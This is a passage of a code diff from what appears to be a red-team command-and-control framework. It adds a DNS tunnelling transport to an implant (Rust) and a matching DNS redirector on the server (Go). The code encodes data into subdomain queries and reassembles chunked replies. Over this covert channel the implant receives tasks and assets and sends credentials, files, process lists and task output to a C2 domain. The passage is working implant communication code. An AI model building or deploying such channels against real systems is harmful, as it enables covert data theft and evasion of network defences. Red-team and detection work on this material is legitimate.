1-2: chunk count (uint16 big-endian) + // Byte 3: CRC low byte + let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; + let crc_low = response[3]; + + #[cfg(debug_assertions)] + log::debug!( + "Init response is chunked (binary format), chunks={}, crc_low={}", + total_chunks, + crc_low + ); + + // Fetch conversation ID chunks using temp conv_id + // Pass crc_low as expected_crc - fetch_response_chunks will only check low byte for binary chunking + let conv_id = self + .fetch_response_chunks(&temp_conv_id, total_chunks, crc_low as u16) + .await?; + + let conv_id_str = String::from_utf8_lossy(&conv_id).to_string(); + + #[cfg(debug_assertions)] + log::debug!("Received chunked conversation ID: {}", conv_id_str); + + return Ok(conv_id_str); + } + + let response_str = String::from_utf8_lossy(&response).to_string(); + + // Check if response is text chunked indicator + if response_str.starts_with(RESP_CHUNKED) { + // Chunked conversation ID response (for A/AAAA records) + #[cfg(debug_assertions)] + log::debug!("Init response is chunked, parsing metadata"); + + let chunked_info = &response_str[RESP_CHUNKED.len()..]; + let parts: Vec<&str> = chunked_info.split(':').collect(); + + // Check if we have a complete chunked indicator (should have 2 parts: chunks and crc) + if parts.len() != 2 || parts[0].is_empty() || parts[1].is_empty() { + // Incomplete chunked indicator - this can happen with A records + // The indicator itself was truncated, so we need to fetch it + #[cfg(debug_assertions)] + log::debug!("Chunked indicator truncated, response: '{}', fetching full metadata", response_str); + + // For A/AAAA records, the chunked indicator might be split across multiple queries + // We need to piece together the full indicator by making fetch queries + // Use a special approach: concatenate responses until we have valid format + let mut full_indicator = response_str.clone(); + let mut fetch_seq = 0; + + // Try up to 10 fetches to get the full indicator + while fetch_seq < 10 { + let subdomain = + self.build_packet(TYPE_FETCH, fetch_seq, &temp_conv_id, &[])?; + match self.send_query(&subdomain).await { + Ok(chunk_data) if !chunk_data.is_empty() => { + full_indicator + .push_str(&String::from_utf8_lossy(&chunk_data)); + + // Try to parse again + if let Some(chunked_start) = + full_indicator.find(RESP_CHUNKED) + { + let info = &full_indicator + [chunked_start + RESP_CHUNKED.len()..]; + let parts: Vec<&str> = info.split(':').collect(); + if parts.len() >= 2 + && !parts[0].is_empty() + && !parts[1].is_empty() + { + // We have a complete indicator now + match ( + Self::decode_seq(parts[0]), + Self::decode_seq(parts[1]), + ) { + (Ok(total_chunks), Ok(expected_crc)) => { + #[cfg(debug_assertions)] + log::debug!("Reconstructed full chunked indicator: chunks={}, crc={}", total_chunks, expected_crc); + + // Now fetch the actual conversation ID chunks + // Start from fetch_seq + 1 since we already consumed some fetches for metadata + let conv_id = self + .fetch_response_chunks( + &temp_conv_id, + total_chunks, + expected_crc as u16, + ) + .await?; + let conv_id_str = + String::from_utf8_lossy(&conv_id) + .to_string(); + + return Ok(conv_id_str); + } + _ => { + // Keep trying + } + } + } + } + + fetch_seq += 1; + } + _ => break, + } + } + + return Err(anyhow::anyhow!( + "Failed to reconstruct chunked indicator after {} fetches: {}", + fetch_seq, + full_indicator + )); + } + + let total_chunks = Self::decode_seq(parts[0])?; + let expected_crc = Self::decode_seq(parts[1])?; + + // Fetch conversation ID chunks using temp conv_id + let conv_id = self + .fetch_response_chunks(&temp_conv_id, total_chunks, expected_crc as u16) + .await?; + // Trim null bytes that may be padding from A/AAAA record responses + let conv_id_str = String::from_utf8_lossy(&conv_id) + .trim_end_matches('\0') + .to_string(); + + #[cfg(debug_assertions)] + log::debug!("Received chunked conversation ID: {}", conv_id_str); + + return Ok(conv_id_str); + } else { + // Direct conversation ID response (single packet) + // For A/AAAA records, may have null padding + let trimmed = response_str.trim_end_matches('\0').to_string(); + + #[cfg(debug_assertions)] + log::debug!("Received conversation ID: {}", trimmed); + + return Ok(trimmed); + } + } + Ok(Ok(_)) => { + #[cfg(debug_assertions)] + log::warn!( + "Init packet attempt {}: server returned empty response", + attempt + 1 + ); + } + Ok(Err(e)) => { + #[cfg(debug_assertions)] + log::warn!( + "Init packet attempt {}: send_query failed: {}", + attempt + 1, + e + ); + } + Err(_) => { + #[cfg(debug_assertions)] + log::warn!( + "Init packet attempt {}: timeout after {}s", + attempt + 1, + INIT_TIMEOUT_SECS + ); + } + } + + if attempt < MAX_RETRIES - 1 { + let delay = 1 << attempt; // Exponential backoff: 1s, 2s, 4s, 8s, 16s + #[cfg(debug_assertions)] + log::debug!("Waiting {}s before retry...", delay); + tokio::time::sleep(tokio::time::Duration::from_secs(delay)).await; + } + } + + Err(anyhow::anyhow!( + "Failed to get conversation ID after {} retries", + MAX_RETRIES + )) + } + + async fn send_chunks( + &mut self, + conv_id: &str, + chunks: &[Vec], + total_chunks_declared: usize, + ) -> Result<()> { + for (idx, chunk) in chunks.iter().enumerate() { + // Don't send more chunks than declared in init + if idx >= total_chunks_declared { + #[cfg(debug_assertions)] + log::error!( + "BUG: Attempted to send chunk {} but only declared {} chunks in init packet", + idx, + total_chunks_declared + ); + break; + } + + let subdomain = self.build_packet(TYPE_DATA, idx, conv_id, chunk)?; + self.send_query(&subdomain).await?; + } + + Ok(()) + } + + /// Send end packet and get server response + async fn send_end(&mut self, conv_id: &str, last_seq: usize) -> Result> { + let subdomain = self.build_packet(TYPE_END, last_seq, conv_id, &[])?; + + for attempt in 0..MAX_RETRIES { + #[cfg(debug_assertions)] + log::debug!( + "Sending end packet, attempt {}/{}", + attempt + 1, + MAX_RETRIES + ); + + match tokio::time::timeout( + tokio::time::Duration::from_secs(CHUNK_TIMEOUT_SECS), + self.send_query(&subdomain), + ) + .await + { + Ok(Ok(response)) if !response.is_empty() => { + return Ok(response); + } + _ => { + if attempt < MAX_RETRIES - 1 { + tokio::time::sleep(tokio::time::Duration::from_secs(2)).await; + } + } + } + } + + Err(anyhow::anyhow!( + "Failed to get server response after {} retries", + MAX_RETRIES + )) + } + + /// Parse server response and handle missing chunks + async fn handle_response( + &mut self, + conv_id: &str, + response: &[u8], + chunks: &[Vec], + retry_count: usize, + ) -> Result> { + const MAX_MISSING_CHUNK_RETRIES: usize = 5; + + // Check if response is binary chunked indicator (magic byte 0xFF) + if response.len() >= 4 && response[0] == 0xFF { + // Binary chunked indicator format (for A records): + // Byte 0: 0xFF (magic) + // Bytes 1-2: chunk count (uint16 big-endian) + // Byte 3: CRC low byte + let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; + let crc_low = response[3]; + + #[cfg(debug_assertions)] + log::debug!( + "Response is chunked (binary format), chunks={}, crc_low={}", + total_chunks, + crc_low + ); + + // Fetch all response chunks + // Pass crc_low as expected_crc - fetch_response_chunks will only check low byte for binary chunking + let data = self + .fetch_response_chunks(conv_id, total_chunks, crc_low as u16) + .await?; + + return Ok(data); + } + + let response_str = String::from_utf8_lossy(response); + + // Check response type + if response_str.starts_with(RESP_OK) { + // Success - decode response data + let response_data = &response_str[RESP_OK.len()..]; + return Self::decode_base32(response_data); + } else if response_str.starts_with(RESP_MISSING) { + if retry_count >= MAX_MISSING_CHUNK_RETRIES { + return Err(anyhow::anyhow!( + "Exceeded maximum retries ({}) for missing chunks", + MAX_MISSING_CHUNK_RETRIES + )); + } + + // Missing chunks - parse and resend + let missing_str = &response_str[RESP_MISSING.len()..]; + let missing_seqs: Result> = missing_str + .split(',') + .filter(|s| !s.is_empty()) + .map(|s| Self::decode_seq(s)) + .collect(); + + let missing_seqs = missing_seqs?; + + #[cfg(debug_assertions)] + log::debug!( + "Server reports {} missing chunks: {:?}", + missing_seqs.len(), + missing_seqs + ); + + // Resend missing chunks + for seq in &missing_seqs { + if *seq < chunks.len() { + let subdomain = self.build_packet(TYPE_DATA, *seq, conv_id, &chunks[*seq])?; + self.send_query(&subdomain).await?; + } else { + #[cfg(debug_assertions)] + log::warn!( + "Server requested chunk {} but we only have {} chunks", + seq, + chunks.len() + ); + } + } + + // Small delay to let resent chunks arrive before sending end packet again + tokio::time::sleep(tokio::time::Duration::from_millis(50)).await; + + // Retry end packet + let last_seq = chunks.len().saturating_sub(1); + let response = self.send_end(conv_id, last_seq).await?; + + // Recursive retry with incremented counter + return Box::pin(self.handle_response(conv_id, &response, chunks, retry_count + 1)) + .await; + } else if response_str.starts_with(RESP_CHUNKED) { + // Response is chunked - fetch all chunks + // For A/AAAA records, response may be padded with nulls + let chunked_info = response_str[RESP_CHUNKED.len()..].trim_end_matches('\0'); + let parts: Vec<&str> = chunked_info.split(':').collect(); + + if parts.len() != 2 { + return Err(anyhow::anyhow!("Invalid chunked response format")); + } + + let total_chunks = Self::decode_seq(parts[0])?; + let expected_crc = Self::decode_base36_crc(parts[1])?; + + #[cfg(debug_assertions)] + log::debug!( + "Response is chunked: {} chunks, CRC={}", + total_chunks, + expected_crc + ); + + // Fetch all response chunks + return self + .fetch_response_chunks(conv_id, total_chunks, expected_crc) + .await; + } else if response_str.starts_with(RESP_ERROR) { + return Err(anyhow::anyhow!("Server error: {}", response_str)); + } + + Err(anyhow::anyhow!("Unknown server response")) + } + + /// Fetch chunked response from server + /// For binary (A/AAAA): expected_crc is low byte only (0-255) + /// For text (TXT): expected_crc is full 16-bit CRC + async fn fetch_response_chunks( + &mut self, + conv_id: &str, + total_chunks: usize, + expected_crc: u16, + ) -> Result> { + // TXT uses base32-encoded text, A/AAAA use raw bytes + let is_text_chunking = self.current_record_type == TXT_RECORD_TYPE; + + let mut encoded_response = String::new(); + let mut binary_response = Vec::new(); + + // Fetch each chunk + for seq in 0..total_chunks { + let subdomain = self.build_packet(TYPE_FETCH, seq, conv_id, &[])?; + let response = self.send_query(&subdomain).await?; + + if is_text_chunking { + // TXT records: response is "ok:" prefix + base32 data + let response_str = String::from_utf8_lossy(&response); + if !response_str.starts_with(RESP_OK) { + return Err(anyhow::anyhow!( + "Failed to fetch chunk {}: {}", + seq, + response_str + )); + } + let chunk_data = &response_str[RESP_OK.len()..]; + encoded_response.push_str(chunk_data); + } else { + // A/AAAA records: response is raw binary data (no prefix) + // Trim null bytes from AAAA padding (16-byte alignment) + let trimmed_end = response + .iter() + .rposition(|&b| b != 0) + .map(|i| i + 1) + .unwrap_or(0); + binary_response.extend_from_slice(&response[..trimmed_end]); + } + } + + // Send final fetch to signal cleanup (seq = total_chunks) + let subdomain = self.build_packet(TYPE_FETCH, total_chunks, conv_id, &[])?; + let _ = self.send_query(&subdomain).await; // Ignore response + + #[cfg(debug_assertions)] + if is_text_chunking { + log::debug!( + "Fetched all {} chunks, total encoded size: {}", + total_chunks, + encoded_response.len() + ); + } else { + log::debug!( + "Fetched all {} chunks, total binary size: {}", + total_chunks, + binary_response.len() + ); + } + + // Decode based on chunking type + let decoded = if is_text_chunking { + // TXT: Decode base32 + Self::decode_base32(&encoded_response)? + } else { + // A/AAAA: Already binary + binary_response + }; + + // Verify CRC + let actual_crc = Self::calculate_crc16(&decoded); + + // For binary chunking (A/AAAA), we only have the low byte of the CRC + // For text chunking (TXT), we have the full 16-bit CRC + let crc_match = if is_text_chunking { + actual_crc == expected_crc + } else { + (actual_crc & 0xFF) == (expected_crc & 0xFF) + }; + + if !crc_match { + return Err(anyhow::anyhow!( + "CRC mismatch on chunked response: expected {}, got {} (low byte check: {})", + expected_crc, + actual_crc, + if is_text_chunking { + "full" + } else { + "low byte only" + } + )); + } + + #[cfg(debug_assertions)] + log::debug!( + "Successfully reassembled chunked response, {} bytes", + decoded.len() + ); + + Ok(decoded) + } + + /// Perform a complete request-response cycle via DNS + /// Perform a DNS-based RPC exchange with automatic retry on failure + async fn dns_exchange(&mut self, method: &str, data: &[u8]) -> Result> { + let mut last_error = None; + + for attempt in 0..EXCHANGE_MAX_RETRIES { + match self.dns_exchange_attempt(method, data).await { + Ok(response) => { + #[cfg(debug_assertions)] + if attempt > 0 { + log::info!( + "DNS exchange succeeded on attempt {}/{}", + attempt + 1, + EXCHANGE_MAX_RETRIES + ); + } + return Ok(response); + } + Err(e) => { + #[cfg(debug_assertions)] + log::warn!( + "DNS exchange attempt {}/{} failed: {}", + attempt + 1, + EXCHANGE_MAX_RETRIES, + e + ); + + last_error = Some(e); + + if attempt < EXCHANGE_MAX_RETRIES - 1 { + // Exponential backoff: 3s, 6s, 12s, 24s + let delay = EXCHANGE_RETRY_DELAY_SECS * (1 << attempt); + + #[cfg(debug_assertions)] + log::info!("Retrying DNS exchange in {} seconds...", delay); + + tokio::time::sleep(tokio::time::Duration::from_secs(delay)).await; + } + } + } + } + + Err(last_error.unwrap_or_else(|| { + anyhow::anyhow!( + "DNS exchange failed after {} attempts", + EXCHANGE_MAX_RETRIES + ) + })) + } + + /// Internal implementation of DNS exchange (single attempt) + async fn dns_exchange_attempt(&mut self, method: &str, data: &[u8]) -> Result> { + // Lazy initialize socket + if self.socket.is_none() { + let socket = UdpSocket::bind("0.0.0.0:0") + .await + .context("Failed to create UDP socket")?; + self.socket = Some(std::sync::Arc::new(socket)); + } + + // Calculate CRC16 of the data + let data_crc = Self::calculate_crc16(data); + + #[cfg(debug_assertions)] + log::debug!( + "DNS exchange: method={}, data_len={}, crc={}", + method, + data.len(), + data_crc + ); + + // Calculate max data size based on domain length + let max_data_size = self.calculate_max_data_size(); + + // Split RAW BINARY data into chunks (no base32 encoding yet) + let chunks: Vec> = data + .chunks(max_data_size) + .map(|chunk| chunk.to_vec()) + .collect(); + + let total_chunks = chunks.len(); + + #[cfg(debug_assertions)] + log::debug!( + "DNS exchange: chunks={}, max_data_size={}", + total_chunks, + max_data_size + ); + + // Step 1: Send init packet and get conversation ID + let conv_id = self.send_init(method, total_chunks, data_crc).await?; + + // Step 2: Send data chunks + self.send_chunks(&conv_id, &chunks, total_chunks).await?; + + // Step 3: Send end packet and get response + let last_seq = total_chunks.saturating_sub(1); + let response = self.send_end(&conv_id, last_seq).await?; + + // Step 4: Handle response (including retries for missing chunks) + self.handle_response(&conv_id, &response, &chunks, 0).await + } + + /// Perform a unary RPC call via DNS + async fn unary_rpc(&mut self, request: Req, path: &str) -> Result + where + Req: Message + Send + 'static, + Resp: Message + Default + Send + 'static, + { + // Marshal and encrypt request + let request_bytes = marshal_with_codec::(request)?; + + // Send via DNS + let response_bytes = self.dns_exchange(path, &request_bytes).await?; + + // Unmarshal and decrypt response + unmarshal_with_codec::(&response_bytes) + } +} + +impl Transport for DNS { + fn init() -> Self { + DNS { + dns_server: None, + base_domain: String::new(), + socket: None, + preferred_record_type: TXT_RECORD_TYPE, + current_record_type: TXT_RECORD_TYPE, + enable_fallback: true, + } + } + + fn new(callback: String, _proxy_uri: Option) -> Result { + // URL format: dns:///[?type=TXT|A|AAAA&fallback=true|false] + // Examples: + // dns://8.8.8.8/c2.example.com - Specific server, TXT with fallback + // dns://*/c2.example.com?type=A - System resolver, prefer A records + // dns://*/c2.example.com?fallback=false - TXT only, no fallback + let url = callback.trim_start_matches("dns://"); + + // Split URL and query params + let (server_domain, query_params) = if let Some(idx) = url.find('?') { + (&url[..idx], Some(&url[idx + 1..])) + } else { + (url, None) + }; + + let parts: Vec<&str> = server_domain.split('/').collect(); + + if parts.len() != 2 { + return Err(anyhow::anyhow!( + "Invalid DNS callback format. Expected: dns:///[?options]" + )); + } + + let dns_server = if parts[0] == "*" { + // Use system resolver + None + } else if parts[0].contains(':') { + Some(parts[0].to_string()) + } else { + Some(format!("{}:53", parts[0])) + }; + + let base_domain = parts[1].to_string(); + + // Parse query parameters + let mut preferred_record_type = TXT_RECORD_TYPE; + let mut enable_fallback = true; + + if let Some(params) = query_params { + for param in params.split('&') { + if let Some((key, value)) = param.split_once('=') { + match key { + "type" => { + preferred_record_type = match value.to_uppercase().as_str() { + "TXT" => TXT_RECORD_TYPE, + "A" => A_RECORD_TYPE, + "AAAA" => AAAA_RECORD_TYPE, + _ => { + return Err(anyhow::anyhow!( + "Invalid record type: {}. Expected TXT, A, or AAAA", + value + )) + } + }; + } + "fallback" => { + enable_fallback = match value.to_lowercase().as_str() { + "true" | "1" | "yes" => true, + "false" | "0" | "no" => false, + _ => { + return Err(anyhow::anyhow!( + "Invalid fallback value: {}. Expected true or false", + value + )) + } + }; + } + _ => {} // Ignore unknown parameters + } + } + } + } + + Ok(DNS { + dns_server, + base_domain, + socket: None, + preferred_record_type, + current_record_type: preferred_record_type, // Start with preferred type + enable_fallback, + }) + } + + async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result { + self.unary_rpc(request, CLAIM_TASKS_PATH).await + } + + async fn fetch_asset( + &mut self, + request: FetchAssetRequest, + tx: Sender, + ) -> Result<()> { + #[cfg(debug_assertions)] + let filename = request.name.clone(); + + // Marshal request + let request_bytes = marshal_with_codec::(request)?; + + // Send via DNS and get streaming response + let response_bytes = self.dns_exchange(FETCH_ASSET_PATH, &request_bytes).await?; + + // For streaming responses, we need to chunk them + // The response contains multiple FetchAssetResponse messages concatenated + let mut offset = 0; + while offset < response_bytes.len() { + if offset + 4 > response_bytes.len() { + break; + } + + // Read message length (first 4 bytes) + let msg_len = u32::from_be_bytes([ + response_bytes[offset], + response_bytes[offset + 1], + response_bytes[offset + 2], + response_bytes[offset + 3], + ]) as usize; + offset += 4; + + if offset + msg_len > response_bytes.len() { + break; + } + + // Decrypt and decode message + match unmarshal_with_codec::( + &response_bytes[offset..offset + msg_len], + ) { + Ok(msg) => { + if tx.send(msg).is_err() { + #[cfg(debug_assertions)] + log::error!("Failed to send asset chunk: {}", filename); + break; + } + } + Err(_err) => { + #[cfg(debug_assertions)] + log::error!( + "Failed to decrypt/decode asset chunk: {}: {}", + filename, + _err + ); + break; + } + } + + offset += msg_len; + } + + Ok(()) + } + + async fn report_credential( + &mut self, + request: ReportCredentialRequest, + ) -> Result { + self.unary_rpc(request, REPORT_CREDENTIAL_PATH).await + } + + async fn report_file( + &mut self, + request: Receiver, + ) -> Result { + #[cfg(debug_assertions)] + log::debug!("report_file: starting to collect chunks"); + + // Spawn a task to collect chunks from the sync channel receiver + // This is necessary because iterating over the sync receiver would block the async task + let handle = tokio::spawn(async move { + let mut all_chunks = Vec::new(); + let mut chunk_count = 0; + + // Iterate over the sync channel receiver in a spawned task to avoid blocking + for chunk in request { + chunk_count += 1; + let chunk_bytes = + marshal_with_codec::(chunk)?; + all_chunks.extend_from_slice(&(chunk_bytes.len() as u32).to_be_bytes()); + all_chunks.extend_from_slice(&chunk_bytes); + } + + #[cfg(debug_assertions)] + log::debug!( + "report_file: collected {} chunks, total {} bytes", + chunk_count, + all_chunks.len() + ); + + Ok::, anyhow::Error>(all_chunks) + }); + + // Wait for the spawned task to complete + let all_chunks = handle + .await + .context("Failed to join chunk collection task")??; + + // Send via DNS + let response_bytes = self.dns_exchange(REPORT_FILE_PATH, &all_chunks).await?; + + #[cfg(debug_assertions)] + log::debug!( + "report_file: received response, {} bytes", + response_bytes.len() + ); + + // Unmarshal response + unmarshal_with_codec::(&response_bytes) + } + + async fn report_process_list( + &mut self, + request: ReportProcessListRequest, + ) -> Result { + self.unary_rpc(request, REPORT_PROCESS_LIST_PATH).await + } + + async fn report_task_output( + &mut self, + request: ReportTaskOutputRequest, + ) -> Result { + self.unary_rpc(request, REPORT_TASK_OUTPUT_PATH).await + } + + async fn reverse_shell( + &mut self, + _rx: tokio::sync::mpsc::Receiver, + _tx: tokio::sync::mpsc::Sender, + ) -> Result<()> { + Err(anyhow::anyhow!( + "DNS transport does not support reverse shell" + )) + } +} diff --git a/implants/lib/transport/src/lib.rs b/implants/lib/transport/src/lib.rs index 7ccff652b..247210170 100644 --- a/implants/lib/transport/src/lib.rs +++ b/implants/lib/transport/src/lib.rs @@ -1,7 +1,13 @@ #[cfg(all(feature = "grpc", feature = "http1"))] compile_error!("only one transport may be selected"); +#[cfg(all(feature = "grpc", feature = "dns"))] +compile_error!("only one transport may be selected"); +#[cfg(all(feature = "http1", feature = "dns"))] +compile_error!("only one transport may be selected"); #[cfg(all(feature = "grpc-doh", feature = "http1"))] compile_error!("grpc-doh is only supported by the grpc transport"); +#[cfg(all(feature = "grpc-doh", feature = "dns"))] +compile_error!("grpc-doh is only supported by the grpc transport"); #[cfg(feature = "grpc")] mod grpc; @@ -16,6 +22,11 @@ mod http; #[cfg(feature = "http1")] pub use http::HTTP as ActiveTransport; +#[cfg(feature = "dns")] +mod dns; +#[cfg(feature = "dns")] +pub use dns::DNS as ActiveTransport; + #[cfg(feature = "mock")] mod mock; #[cfg(feature = "mock")] diff --git a/tavern/app.go b/tavern/app.go index a659f2ae5..24edec60d 100644 --- a/tavern/app.go +++ b/tavern/app.go @@ -41,6 +41,7 @@ import ( _ "realm.pub/tavern/internal/redirectors/grpc" _ "realm.pub/tavern/internal/redirectors/http1" + _ "realm.pub/tavern/internal/redirectors/dns" ) func init() { diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go new file mode 100644 index 000000000..563bf2d7a --- /dev/null +++ b/tavern/internal/redirectors/dns/dns.go @@ -0,0 +1,1047 @@ +package dns + +import ( + "context" + "encoding/base32" + "encoding/binary" + "fmt" + "log/slog" + "math/rand" + "net" + "net/url" + "strings" + "sync" + "time" + + "google.golang.org/grpc" + "google.golang.org/grpc/codes" + "google.golang.org/grpc/metadata" + "google.golang.org/grpc/status" + "realm.pub/tavern/internal/redirectors" +) + +const ( + // DNS protocol limits + dnsHeaderSize = 12 // Standard DNS header size + maxLabelLength = 63 // Maximum bytes in a DNS label + txtRecordType = 16 // TXT record QTYPE + dnsClassIN = 1 // Internet class + defaultUDPPort = "53" + convTimeout = 15 * time.Minute // Conversation expiration + + // Protocol field sizes (base36 encoding) + typeSize = 1 // Packet type: i/d/e/f + seqSize = 5 // Sequence: 36^5 = 60,466,176 max chunks + convIDSize = 12 // Conversation ID length + headerSize = typeSize + seqSize + convIDSize + + // Packet types + typeInit = 'i' // Init: establish conversation + typeData = 'd' // Data: send chunk + typeEnd = 'e' // End: finalize and process + typeFetch = 'f' // Fetch: retrieve response chunk + + // Response prefixes (TXT records) + respOK = "ok:" // Success with data + respMissing = "m:" // Missing chunks list + respError = "e:" // Error message + respChunked = "r:" // Response chunked metadata + + // Response size limits (to fit in single UDP packet) + maxDNSResponseSize = 1400 // Conservative MTU limit + maxResponseChunkSize = 1200 // Base32-encoded chunk size +) + +func init() { + redirectors.Register("dns", &Redirector{}) +} + +func min(a, b int) int { + if a < b { + return a + } + return b +} + +// Redirector handles DNS-based C2 communication +type Redirector struct { + conversations sync.Map // conv_id -> *Conversation + baseDomains []string // Accepted base domains for queries +} + +// Conversation tracks state for a request-response exchange +type Conversation struct { + mu sync.Mutex + id string + methodPath string // gRPC method path + totalChunks int // Expected number of request chunks + expectedCRC uint16 // CRC16 of complete request data + chunks map[int][]byte // Received request chunks + lastActivity time.Time + + // Response chunking (for large responses) + responseData []byte + responseChunks []string // Base32 encoded (TXT) or raw binary (A/AAAA) + responseCRC uint16 + isBinaryChunking bool // true for A/AAAA, false for TXT +} + +func (r *Redirector) Redirect(ctx context.Context, listenOn string, upstream *grpc.ClientConn) error { + listenAddr, domains, err := parseListenAddr(listenOn) + if err != nil { + return fmt.Errorf("failed to parse listen address: %w", err) + } + + if len(domains) == 0 { + return fmt.Errorf("no base domains specified in listenOn parameter") + } + + r.baseDomains = domains + + udpAddr, err := net.ResolveUDPAddr("udp", listenAddr) + if err != nil { + return fmt.Errorf("failed to resolve UDP address: %w", err) + } + + conn, err := net.ListenUDP("udp", udpAddr) + if err != nil { + return fmt.Errorf("failed to listen on UDP: %w", err) + } + defer conn.Close() + + slog.Info("DNS redirector started", "listen_on", listenAddr, "base_domains", r.baseDomains) + + go r.cleanupConversations(ctx) + + buf := make([]byte, 4096) + for { + select { + case <-ctx.Done(): + return ctx.Err() + default: + conn.SetReadDeadline(time.Now().Add(1 * time.Second)) + + n, addr, err := conn.ReadFromUDP(buf) + if err != nil { + if netErr, ok := err.(net.Error); ok && netErr.Timeout() { + continue + } + slog.Error("failed to read UDP packet", "error", err) + continue + } + + go r.handleDNSQuery(ctx, conn, addr, buf[:n], upstream) + } + } +} + +// parseListenAddr extracts address and domain parameters from listenOn string +// Format: "addr:port?domain=example.com&domain=other.com" +func parseListenAddr(listenOn string) (string, []string, error) { + parts := strings.SplitN(listenOn, "?", 2) + addr := parts[0] + + if !strings.Contains(addr, ":") { + addr = net.JoinHostPort(addr, defaultUDPPort) + } + + if len(parts) == 1 { + return addr, nil, nil + } + + queryParams := parts[1] + domains := []string{} + + for _, param := range strings.Split(queryParams, "&") { + kv := strings.SplitN(param, "=", 2) + if len(kv) != 2 { + continue + } + + key := kv[0] + value := kv[1] + + if key == "domain" && value != "" { + decoded, err := url.QueryUnescape(value) + if err != nil { + return "", nil, fmt.Errorf("failed to decode domain value: %w", err) + } + domains = append(domains, decoded) + } + } + + return addr, domains, nil +} + +func (r *Redirector) cleanupConversations(ctx context.Context) { + ticker := time.NewTicker(1 * time.Minute) + defer ticker.Stop() + + for { + select { + case <-ctx.Done(): + return + case <-ticker.C: + now := time.Now() + r.conversations.Range(func(key, value interface{}) bool { + conv := value.(*Conversation) + conv.mu.Lock() + if now.Sub(conv.lastActivity) > convTimeout { + r.conversations.Delete(key) + slog.Debug("conversation expired", "conv_id", conv.id) + } + conv.mu.Unlock() + return true + }) + } + } +} + +func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr *net.UDPAddr, query []byte, upstream *grpc.ClientConn) { + if len(query) < dnsHeaderSize { + slog.Debug("query too short") + return + } + + transactionID := binary.BigEndian.Uint16(query[0:2]) + + domain, queryType, err := r.parseDomainNameAndType(query[dnsHeaderSize:]) + if err != nil { + slog.Debug("failed to parse domain", "error", err) + return + } + + slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) + + domainParts := strings.Split(domain, ".") + var subdomainParts []string + var matchedBaseDomain string + + for _, baseDomain := range r.baseDomains { + baseDomainParts := strings.Split(baseDomain, ".") + + if len(domainParts) <= len(baseDomainParts) { + continue + } + + domainSuffix := domainParts[len(domainParts)-len(baseDomainParts):] + matched := true + for i, part := range baseDomainParts { + if !strings.EqualFold(part, domainSuffix[i]) { + matched = false + break + } + } + + if matched { + subdomainParts = domainParts[:len(domainParts)-len(baseDomainParts)] + matchedBaseDomain = baseDomain + break + } + } + + if matchedBaseDomain == "" { + slog.Debug("domain doesn't match any configured base domains", "domain", domain, "base_domains", r.baseDomains) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + if len(subdomainParts) < 1 { + slog.Debug("no subdomain found", "domain", domain, "matched_base_domain", matchedBaseDomain) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + // Reassemble all subdomain labels (they form a base32-encoded packet) + fullSubdomain := strings.Join(subdomainParts, "") + + // Decode base32 to get raw packet bytes + packetBytes, err := decodeBase32(fullSubdomain) + if err != nil { + slog.Debug("failed to decode base32 subdomain", "error", err, "subdomain", fullSubdomain[:min(len(fullSubdomain), 50)]) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + // Parse packet: [type:1][seq:5][convid:12][data...] + if len(packetBytes) < headerSize { + slog.Debug("packet too short after decoding", "size", len(packetBytes), "min_size", headerSize) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + pktType := rune(packetBytes[0]) + seqStr := string(packetBytes[typeSize : typeSize+seqSize]) + convID := string(packetBytes[typeSize+seqSize : headerSize]) + data := packetBytes[headerSize:] // Keep as []byte, don't convert to string + + slog.Debug("parsed packet", "type", string(pktType), "seq_str", seqStr, "conv_id", convID, "data_len", len(data), "total_packet_len", len(packetBytes)) + + seq, err := decodeSeq(seqStr) + if err != nil { + slog.Debug("invalid sequence", "seq", seqStr, "error", err) + r.sendErrorResponse(conn, addr, transactionID) + return + } + + var responseData []byte + switch pktType { + case typeInit: + responseData, err = r.handleInitPacket(convID, string(data)) + case typeData: + responseData, err = r.handleDataPacket(convID, seq, data) + case typeEnd: + responseData, err = r.handleEndPacket(ctx, upstream, convID, seq, queryType) + case typeFetch: + responseData, err = r.handleFetchPacket(convID, seq) + default: + err = fmt.Errorf("unknown packet type: %c", pktType) + } + + if err != nil { + slog.Error("failed to handle packet", "type", string(pktType), "error", err) + errorResp := fmt.Sprintf("%s%s", respError, err.Error()) + r.sendDNSResponse(conn, addr, transactionID, domain, []byte(errorResp), queryType) + return + } + + var maxCapacity int + switch queryType { + case txtRecordType: + maxCapacity = maxDNSResponseSize + case 1: + maxCapacity = 4 + case 28: + maxCapacity = 16 + default: + maxCapacity = maxDNSResponseSize + } + + slog.Debug("checking if chunking needed", "query_type", queryType, "response_size", len(responseData), + "max_capacity", maxCapacity, "packet_type", string(pktType)) + + if queryType != txtRecordType && len(responseData) > maxCapacity && (pktType == typeEnd || pktType == typeInit) { + var conv *Conversation + var actualConvID string + + if pktType == typeInit { + actualConvID = convID + conv = &Conversation{ + id: actualConvID, + lastActivity: time.Now(), + responseData: responseData, + responseCRC: calculateCRC16(responseData), + isBinaryChunking: true, + } + r.conversations.Store(actualConvID, conv) + } else { + convVal, ok := r.conversations.Load(convID) + if !ok { + slog.Error("conversation not found for chunking", "conv_id", convID) + r.sendDNSResponse(conn, addr, transactionID, domain, responseData, queryType) + return + } + conv = convVal.(*Conversation) + actualConvID = convID + } + + conv.mu.Lock() + + conv.responseData = responseData + conv.responseCRC = calculateCRC16(responseData) + conv.isBinaryChunking = true + + conv.responseChunks = nil + for i := 0; i < len(responseData); i += maxCapacity { + end := i + maxCapacity + if end > len(responseData) { + end = len(responseData) + } + conv.responseChunks = append(conv.responseChunks, string(responseData[i:end])) + } + + conv.mu.Unlock() + + var response []byte + if maxCapacity <= 4 { + if len(conv.responseChunks) > 65535 { + slog.Error("too many chunks for binary format", "chunks", len(conv.responseChunks)) + r.sendErrorResponse(conn, addr, transactionID) + return + } + response = make([]byte, 4) + response[0] = 0xFF + response[1] = byte(len(conv.responseChunks) >> 8) + response[2] = byte(len(conv.responseChunks) & 0xFF) + response[3] = byte(conv.responseCRC & 0xFF) + + slog.Debug("using compact binary chunked indicator", + 